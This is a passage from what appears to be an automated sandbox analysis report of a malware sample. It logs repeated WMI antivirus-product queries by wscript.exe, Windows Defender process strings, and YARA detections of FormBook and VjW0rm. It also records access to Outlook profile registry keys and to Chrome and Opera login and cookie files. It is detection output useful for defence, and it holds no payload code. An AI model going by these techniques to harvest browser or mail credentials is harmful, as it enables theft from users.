Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 0000000D.00000003.631428377.0000013D91838000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Windows Defender\MsMpeng.exe
Source: wscript.exe, 0000000A.00000002.831511243.00000216E07E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.760010015.00000216E07F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759860590.00000216E07E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r\MsMpeng.exe
Source: wscript.exe, 00000001.00000002.837229937.000001922CD43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.805518643.000001922ACD8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.548963430.000001922CD45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: wscript.exe, 0000000F.00000002.811940663.000001D1932F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.789431407.000001D193304000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.786139683.000001D1932EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Defender\MsMpeng.exe

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.bin.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.372823411.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.830373431.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401722166.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.830259140.0000000000B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.308018485.0000024969E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.299860714.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300915140.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.801300107.0000000000910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.291613938.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401531356.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401874829.0000000001840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300404894.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.344226970.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.302134868.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.292414870.0000024969A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.295432260.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300557956.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.805718233.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Yara detected VjW0rm
Source: Yara match File source: 0000000D.00000002.812752920.0000013D91256000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.830575316.000001922C81F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.812070527.000001D194C8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.807977026.00000216DE0B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.812584046.0000013D8F46A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.808147035.00000216DFE16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.830179135.000001922AD6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.807957265.00000216DE0A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.811908702.000001D1932BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.812596470.0000013D8F474000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1892, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\netsh.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.bin.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.372823411.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.830373431.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401722166.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.830259140.0000000000B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.308018485.0000024969E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.299860714.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300915140.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.801300107.0000000000910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.291613938.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401531356.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.401874829.0000000001840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300404894.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.344226970.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.302134868.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.292414870.0000024969A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.295432260.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.300557956.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.805718233.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Yara detected VjW0rm
Source: Yara match File source: 0000000D.00000002.812752920.0000013D91256000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.830575316.000001922C81F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
